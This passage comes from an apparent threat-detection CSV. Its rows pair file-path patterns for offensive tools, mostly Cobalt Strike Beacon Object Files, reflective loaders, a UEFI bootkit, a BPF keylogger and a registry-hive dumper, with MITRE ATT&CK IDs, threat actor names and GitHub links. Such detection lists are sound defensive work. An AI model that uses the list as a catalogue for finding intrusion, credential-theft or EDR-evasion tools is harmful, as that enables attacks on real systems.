T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/bof/IABOF*",".{0,1000}\/bof\/IABOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*/bof/IAStart.asm*",".{0,1000}\/bof\/IAStart\.asm.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*/bof_reg_collect_parser.py*",".{0,1000}\/bof_reg_collect_parser\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/BOF-Builder*",".{0,1000}\/BOF\-Builder.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","24","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" "*/bof-collection/*",".{0,1000}\/bof\-collection\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*/bofhound.git*",".{0,1000}\/bofhound\.git.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/BOFMask.git*",".{0,1000}\/BOFMask\.git.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","2","100","23","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" "*/bofmask.h*",".{0,1000}\/bofmask\.h.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","2","100","23","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" "*/BOFNETExamples/*",".{0,1000}\/BOFNETExamples\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*/BOF-RegSave*",".{0,1000}\/BOF\-RegSave.{0,1000}","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","177","30","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" "*/BofRunner.cs*",".{0,1000}\/BofRunner\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/BOFs.git*",".{0,1000}\/BOFs\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","109","14","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" "*/bof-vs-template/*",".{0,1000}\/bof\-vs\-template\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/bof-vs-template/*",".{0,1000}\/bof\-vs\-template\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/boko.py*",".{0,1000}\/boko\.py.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","65","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" "*/boku7/spawn*",".{0,1000}\/boku7\/spawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","420","69","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "*/boku7/whereami/*",".{0,1000}\/boku7\/whereami\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","157","28","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" "*/BokuLoader.c*",".{0,1000}\/BokuLoader\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*/BokuLoader.h*",".{0,1000}\/BokuLoader\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*/BokuLoader/*",".{0,1000}\/BokuLoader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*/BooExecutor.cs*",".{0,1000}\/BooExecutor\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*/bootkit-rs*",".{0,1000}\/bootkit\-rs.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","487","58","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*/bpf-keylogger.git*",".{0,1000}\/bpf\-keylogger\.git.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","1","N/A","10","1","3","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z" "*/bpf-keylogger/*",".{0,1000}\/bpf\-keylogger\/.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","1","N/A","10","1","3","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z" "*/bq1iFEP2/assert/dll/*",".{0,1000}\/bq1iFEP2\/assert\/dll\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*/bq1iFEP2/assert/exe/*",".{0,1000}\/bq1iFEP2\/assert\/exe\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 